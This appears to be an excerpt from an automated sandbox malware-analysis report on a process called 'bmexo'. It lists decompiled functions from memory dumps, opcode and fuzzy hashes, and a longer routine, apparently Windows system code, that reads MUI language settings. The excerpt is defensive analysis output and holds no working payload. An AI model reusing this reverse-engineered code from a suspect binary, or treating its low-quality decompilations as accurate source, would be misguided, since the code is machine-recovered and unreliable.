                                          				E0041AF60( *((intOrPtr*)(_a4 + 0xa18)), _t5, _t5 + 0xc98,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x36);
                                          				ExitProcess(_a8);
                                          			}



                                          0x0041a663
                                          0x0041a67a
                                          0x0041a688

                                          APIs
                                          • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A688
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_bmexo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: 1cfc6acf09b4d581fed35e39f5b9fca2d0b24bba4d46bbacac3375e597e63901
                                          • Instruction ID: 43fab5bc382f8dbf035fa71370f402dcb25f1a4f198c16d6a3d81994ba933d62
                                          • Opcode Fuzzy Hash: 1cfc6acf09b4d581fed35e39f5b9fca2d0b24bba4d46bbacac3375e597e63901
                                          • Instruction Fuzzy Hash: 70D017726002187BD620EB99CC89FD777ACDF49BA4F1580A5BA0C6B242C934BA5187E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 16%
                                          			E00406EA5(void* __eax, void* __ecx, void* __edx) {
                                          
                                          				_pop(ss);
                                          				asm("movsd");
                                          				return 1;
                                          			}



                                          0x00406ea9
                                          0x00406eb4
                                          0x00406ec4

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_bmexo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: @'3
                                          • API String ID: 0-1540810063
                                          • Opcode ID: 960ba21da6da5e55392697c576a86b5644a44c5be8df4fb06fecea4259f9f9d3
                                          • Instruction ID: 723d2e3db20951e9b4be51d60834d9f1d75f25b8c761883222dbd5c2e59154c3
                                          • Opcode Fuzzy Hash: 960ba21da6da5e55392697c576a86b5644a44c5be8df4fb06fecea4259f9f9d3
                                          • Instruction Fuzzy Hash: 67C08C2AE040A022C0380C4C34902F6E3A8F747121F2032E3D88CBB941C042C5D001C8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 16%
                                          			E0041730E(void* __fp0) {
                                          				intOrPtr _t8;
                                          
                                          				asm("a16 out dx, eax");
                                          				_push(es);
                                          				 *0x1b = _t8;
                                          				asm("insd");
                                          				asm("stosb");
                                          				return 0x1b;
                                          			}




                                          0x0041730e
                                          0x00417315
                                          0x00417316
                                          0x00417318
                                          0x00417319
                                          0x00417326

                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_bmexo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bb093abe361113be9425131f66226babf64f68918a8a1c3f93381d6269f2b4a3
                                          • Instruction ID: da5458df7d5afa84532e9dacf5e10b5b24371f7c4eecfd3cba32dda5b4d8bc21
                                          • Opcode Fuzzy Hash: bb093abe361113be9425131f66226babf64f68918a8a1c3f93381d6269f2b4a3
                                          • Instruction Fuzzy Hash: 14C08C32A078280ECA018CACB8004F0F7B4D64B2A1B4232A2CA08A71118822C80156E8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                          • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                          • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                          • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                          • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                          • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                          • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                          • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                          • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                          • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                          • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                          • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                          • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                          • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                          • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                          • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                          • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                          • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                          • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                          • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                          • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                          • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                          • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                          • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                          • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                          • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                          • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                          • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                          • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                          • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                          • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                          • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                                          • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                          • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                          • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                          • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                          • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                          • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                          • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                          • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 94%
                                          			E009C8788(signed int __ecx, void* __edx, signed int _a4) {
                                          				signed int _v8;
                                          				short* _v12;
                                          				void* _v16;
                                          				signed int _v20;
                                          				char _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				char _v36;
                                          				signed int _v40;
                                          				char _v44;
                                          				signed int _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				signed int _v60;
                                          				char _v68;
                                          				void* _t216;
                                          				intOrPtr _t231;
                                          				short* _t235;
                                          				intOrPtr _t257;
                                          				short* _t261;
                                          				intOrPtr _t284;
                                          				intOrPtr _t288;
                                          				void* _t314;
                                          				signed int _t318;
                                          				short* _t319;
                                          				intOrPtr _t321;
                                          				void* _t328;
                                          				void* _t329;
                                          				char* _t332;
                                          				signed int _t333;
                                          				signed int* _t334;
                                          				void* _t335;
                                          				void* _t338;
                                          				void* _t339;
                                          
                                          				_t328 = __edx;
                                          				_t322 = __ecx;
                                          				_t318 = 0;
                                          				_t334 = _a4;
                                          				_v8 = 0;
                                          				_v28 = 0;
                                          				_v48 = 0;
                                          				_v20 = 0;
                                          				_v40 = 0;
                                          				_v32 = 0;
                                          				_v52 = 0;
                                          				if(_t334 == 0) {
                                          					_t329 = 0xc000000d; // STATUS_INVALID_PARAMETER: caller passed a NULL output block
                                          					L49:
                                          					_t334[0x11] = _v56;
                                          					 *_t334 =  *_t334 | 0x00000800;
                                          					_t334[0x12] = _v60;
                                          					_t334[0x13] = _v28;
                                          					_t334[0x17] = _v20;
                                          					_t334[0x16] = _v48;
                                          					_t334[0x18] = _v40;
                                          					_t334[0x14] = _v32;
                                          					_t334[0x15] = _v52;
                                          					return _t329;
                                          				}
                                          				_v56 = 0;
                                          				if(E009C8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                          					_v56 = 1;
                                          					if(_v8 != 0) {
                                          						_t207 = E009AE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8); // heap handle = TEB(fs:[0x18])->PEB(+0x30)->ProcessHeap(+0x18); argument shape matches RtlFreeHeap(heap, 0, ptr)
                                          					}
                                          					_push(1);
                                          					_v8 = _t318;
                                          					E009C718A(_t207);
                                          					_t335 = _t335 + 4;
                                          				}
                                          				_v60 = _v60 | 0xffffffff;
                                          				if(E009C8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                          					_t333 =  *_v8;
                                          					_v60 = _t333;
                                          					_t314 = E009AE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                          					_push(_t333);
                                          					_v8 = _t318;
                                          					E009C718A(_t314);
                                          					_t335 = _t335 + 4;
                                          				}
                                          				_t216 = E009C8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                          				_t332 = ";"; // separator used to split the language lists read below
                                          				if(_t216 < 0) {
                                          					L17:
                                          					if(E009C8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                          						L30:
                                          						if(E009C8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                          							L46:
                                          							_t329 = 0;
                                          							L47:
                                          							if(_v8 != _t318) {
                                          								E009AE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                          							}
                                          							if(_v28 != _t318) {
                                          								if(_v20 != _t318) {
                                          									E009AE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                          									_v20 = _t318;
                                          									_v40 = _t318;
                                          								}
                                          							}
                                          							goto L49;
                                          						}
                                          						_t231 = _v24;
                                          						_t322 = _t231 + 4;
                                          						_push(_t231);
                                          						_v52 = _t322;
                                          						E009C718A(_t231);
                                          						if(_t322 == _t318) {
                                          							_v32 = _t318;
                                          						} else {
                                          							_v32 = E009AE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                          						}
                                          						if(_v32 == _t318) {
                                          							_v52 = _t318;
                                          							L58:
                                          							_t329 = 0xc0000017; // STATUS_NO_MEMORY: heap allocation for the language list failed
                                          							goto L47;
                                          						} else {
                                          							E009A2340(_v32, _v8, _v24);
                                          							_v16 = _v32;
                                          							_a4 = _t318;
                                          							_t235 = E009BE679(_v32, _t332);
                                          							while(1) {
                                          								_t319 = _t235;
                                          								if(_t319 == 0) {
                                          									break;
                                          								}
                                          								 *_t319 = 0;
                                          								_t321 = _t319 + 2;
                                          								E009AE2A8(_t322,  &_v68, _v16);
                                          								if(E009C5553(_t328,  &_v68,  &_v36) != 0) {
                                          									_a4 = _a4 + 1;
                                          								}
                                          								_v16 = _t321;
                                          								_t235 = E009BE679(_t321, _t332);
                                          								_pop(_t322);
                                          							}
                                          							_t236 = _v16;
                                          							if( *_v16 != _t319) {
                                          								E009AE2A8(_t322,  &_v68, _t236);
                                          								if(E009C5553(_t328,  &_v68,  &_v36) != 0) {
                                          									_a4 = _a4 + 1;
                                          								}
                                          							}
                                          							if(_a4 == 0) {
                                          								E009AE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                          								_v52 = _v52 & 0x00000000;
                                          								_v32 = _v32 & 0x00000000;
                                          							}
                                          							if(_v8 != 0) {
                                          								E009AE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                          							}
                                          							_v8 = _v8 & 0x00000000;
                                          							_t318 = 0;
                                          							goto L46;
                                          						}
